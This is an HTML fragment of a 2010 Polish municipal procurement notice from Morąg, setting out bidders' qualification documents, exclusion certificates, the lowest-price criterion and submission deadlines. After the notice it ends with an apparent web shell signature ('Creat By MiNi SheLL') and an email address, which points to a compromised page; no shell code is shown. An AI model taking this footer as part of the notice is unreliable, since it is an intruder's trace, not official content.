<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Dowód wpłaty wadium
2) Wypełniony formularz ofertowy
3) Oświadczenie o zgodności z warunkami przetargu
4) Zobowiązanie do wniesienia zabezpiecznia
5) Wykaz podwykonawców</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy zawarte są we wzorze umowy, który stanowi załącznik do specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/morag_gmina_miejska/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Morągu
ul. 11 Listopada 9
14-300 Morąg
pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2010 godzina 10:00, miejsce: Urząd Miejski w Morągu
ul. 11 Listopada 9
14-300 Morąg
pokój nr 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Decyzja o przyznaniu dofinansowania w ramach działania 413 Wdrażanie lokalnych strategii rozwoju - Odnowa i rozwój wsi - Program Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com